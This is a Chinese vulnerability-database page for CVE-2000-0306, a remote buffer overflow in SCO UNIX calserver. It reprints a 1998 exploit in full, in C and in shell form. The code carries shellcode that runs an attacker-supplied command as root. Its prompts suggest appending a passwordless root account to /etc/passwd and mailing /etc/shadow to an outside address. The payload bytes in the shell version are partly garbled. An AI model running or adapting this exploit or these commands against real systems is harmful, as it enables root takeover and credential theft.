SCO UNIX calserver远程缓冲区溢出漏洞
| 漏洞ID | 1105391 | 漏洞类型 | 未知 |
| 发布时间 | 1998-12-29 | 更新时间 | 2005-05-02 |
![图片[1]-SCO UNIX calserver远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2000-0306 |
![图片[2]-SCO UNIX calserver远程缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200103-031 |
| 漏洞平台 | SCO | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
SCOUnix是一种商业Unix系统。SCOUnix的calserver实现上存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞获得主机的root用户访问权限。[email protected]为这个漏洞写了一个攻击程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/2353/info
Versions of SCO Unix calserver are vulnerable to a buffer overflow attack which can permit root access to a remote attacker.
*/
#include <stdio.h>
#include <fcntl.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
main(argc, argv)
int argc;
char *argv[];
{
#define calserver_pipe "/usr/lib/scosh/pipes/pdg18e5_0000"
#define start_addr 0x7ffffd80
#define hostnamelen 100
#define portnumberlen 10
#define cmdlen 80
char hostname[hostnamelen],portnumber[portnumberlen],cmd[cmdlen];
char *hn,*pn;
int s;
struct sockaddr_in sin;
struct hostent *hp, *gethostbyname();
char msg[850];
char *msghdr=
"x00x00x00x00" // message length
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"xffxffxffxff"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00x00x00" // packet_sz
"x1cx00x00x00" // opcode
"x00x00x00x00"; // maxmsgsz
char codes[]=
{
"xebx7f" //start : jmp cont
"x5d" //geteip: popl %ebp
"x55" // pushl %ebp
"xfex4dx98" // decb 0xffffff98(%ebp)
"xfex4dx9b" // decb 0xffffff9b(%ebp)
"xfex4dxe7" // decb 0xffffffe7(%ebp)
"xfex4dxeb" // decb 0xffffffeb(%ebp)
"xfex4dxec" // decb 0xffffffec(%ebp)
"xfex4dxed" // decb 0xffffffed(%ebp)
"xffx45xef" // incl 0xffffffef(%ebp)
"xfex4dxf4" // decb 0xfffffff4(%ebp)
"xc3" // ret
"/bin/sh" //
"x01" // 0xffffff98(%ebp)
"-c"
"x01" // 0xffffff9b(%ebp)
" "
" "
"x01" // 0xffffffe7(%ebp)
"x8dx05x3bx01x01x01" //execv : leal 0x3b,%eax
"x9axffxffxffxffx07x01" // lcall 0x7,0x0
"xc7xc4xffxffxffxff" //cont : movl $0xXXXX,%esp
"xe8x76xffxffxff" // call geteip
"x33xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x81xc5x9cxffxffxff" // addl $0xffffff9c,%ebp
"x55" // pushl %ebp
"x81xc5xfdxffxffxff" // addl $0xfffffffd,%ebp
"x55" // pushl %ebp
"x81xc5xf8xffxffxff" // addl $0xfffffff8,%ebp
"x55" // pushl %ebp
"x55" // pushl %ebp
"x5b" // pop %ebx
"x8bxec" // movl %esp,%ebp
"x50" // pushl %eax
"x55" // pushl %ebp
"x53" // pushl %ebx
"x50" // pushl %eax
"xebxc6" // jmp execv
};
if (argc<2)
{
printf("Host [local] : ");
gets(hostname);
if (!strlen(hostname)) strcpy(hostname,"local");
hn=hostname;
}
else
hn=argv[1];
if ((argc<3)&&strcmp("local",hn))
{
printf("Port [6373] : ");
gets(portnumber);
if (!strlen(portnumber)) strcpy(portnumber,"6373");
pn=portnumber;
}
else
pn=argv[2];
printf("Type a command (max length=75), for example :n");
printf(""echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"n");
printf(""mail [email protected]</etc/shadow"n");
printf(" <-----------------------------------75");
printf("------------------------------------>n>");
gets(cmd);
memcpy(codes+40,cmd,strlen(cmd));
memset(msg,'x90',600);
memcpy(msg,msghdr,52);
*(unsigned long*) (msg+201)= *(unsigned long*) (codes+131) = start_addr;
memcpy(msg+600,codes,strlen(codes));
if (!strcmp("local",hn))
{
* (unsigned long*) msg = (unsigned long) (600+strlen(codes)-4);
if ((s=open(calserver_pipe,O_WRONLY)) == -1)
{
printf("Error opening calserver pipen");
exit(1);
};
if (write(s,msg,600+strlen(codes)) == -1)
{
printf("Error writing to the calserver pipen");
exit(1);
};
exit(0);
};
hp = gethostbyname(hn);
if (hp == 0)
{
herror("gethostbyname");
exit(1);
}
memcpy(&sin.sin_addr,hp->h_addr,hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(atoi(pn));
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror("socket");
exit(1);
}
if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) == -1)
{
perror("connect");
exit(1);
}
if (write(s, msg+12,600-12+strlen(codes)) == -1)
{
perror("write");
exit(1);
}
close(s);
}
*** Shell version ***
#!/bin/sh
#
# ... The punishment for inobedience ...
#
# This is a local/remote buffer overflow exploit for calserver bug
# (SCO OpenServer Enterprise System v 5.0.4p).
# If you have any problems with it, drop me a letter.
# Happy New Year !
#
#
# *** Brief manual ***
#
# Local mode is a default mode for the calendar server. If calserver
# runs on your site in this mode just try to run the exploit with only
# argument "local". If calserver operates on your or other sites in the
# network mode you should use exploit with two arguments: "<sitename>" and
# "<portnumber>". Portnumber is usually equal to 6373 but other values are
# possible. Don't use "localhost" or "127.0.0.1" as a <sitename>. Check
# "/usr/lib/scosh/calargs" file to see the current mode of the calendar
# server.
# Execution of the exploit is similar to a blind execution of the
# following command with root permissions: "/bin/sh -c <command>".
# There are a few limitations for number and length of commands. The
# length of a command should not exceed 75 symbols. The number of
# executable commands depends on calserver configuration and it is equal to
# the number of child calendar servers which are basically 4 by default.
# Therefore running of this exploit must be very effective. You are free
# to use sequences of a shell commands separated by ";" as a <command>.
#
# 9.999,99
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1998. E-mail: [email protected]
#
#
#
calserver_pipe="/usr/lib/scosh/pipes/pdg18e5_0000"
msg="/tmp/msg"
msghdr1='�2�3����������'
msghdr2='���������377�377�377�377����������������'
'�����34�������'
codes1='�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�200�375�377�177�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�220�220�220�220�220�220�220�220�220�220�220�220�220�220�220'
'�353�177]U�376M�230�376M�233�376M�347�376M�353�376M�354�376M'
'�355�377E�357�376M�364�303/bin/sh�1-c�1'
codes2='�1�215�5;�1�1�1�232�377�377�377�377�7�1�307�304�200'
'�375�377�177�350v�377�377�3773�300P�201�305�234�377�377�377U'
'�201�305�375�377�377�377U�201�305�370�377�377�377UU[�213�354'
'PUSP�353�306'
rm -f $msg
if [ _$1 = "_" ]
then
{
echo -n "Host [local] :"
read hostname
if [ _$hostname = "_" ]
then
hostname="local"
fi
}
else
hostname=$1
fi
if [ _$hostname = "_local" ]
then
if [ -p $calserver_pipe ]
then
echo -n $msghdr1>$msg
else
echo "Error opening calserver pipe"
exit 1
fi
else
if [ _$2 = "_" ]
then
{
echo -n "Port [6373] :"
read portnumber
if [ _$portnumber = "_" ]
then
portnumber="6373"
fi
}
else
portnumber=$2
fi
fi
echo "Type a command (max length=75), for example :"
echo '"echo r00t::0:0:Leshka Zakharoff:/:>>/etc/passwd"'
echo '"mail [email protected]</etc/shadow"'
echo -n " <-----------------------------------75"
echo -n "------------------------------------>n>"
read c
echo -n $msghdr2$codes1>>$msg
printf "%75s" "$c">>$msg
echo -n $codes2>>$msg
if [ _$hostname = "_local" ]
then
cat $msg>>$calserver_pipe
else
{
echo -n '�377�377�377�377'>>$msg
cat $msg|/etc/ttcp -u -t -l762 -p$portnumber $hostname
}
fi
rm $msg
|参考资料
来源:BUGTRAQ
名称:19981229Local/remoteexploitforSCOUNIX.
链接:http://www.securityfocus.com/templates/archive.pike?list=1&date;=1998-12-29&msg;[email protected]
来源:SCO
名称:SB-99.02
链接:ftp://ftp.sco.com/SSE/security_bulletins/SB-99.02a
相关推荐: ArGoSoft Mail Server Multiple GET Requests Denial Of Service Vulnerability
ArGoSoft Mail Server Multiple GET Requests Denial Of Service Vulnerability 漏洞ID 1100110 漏洞类型 Failure to Handle Exceptional Conditi…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666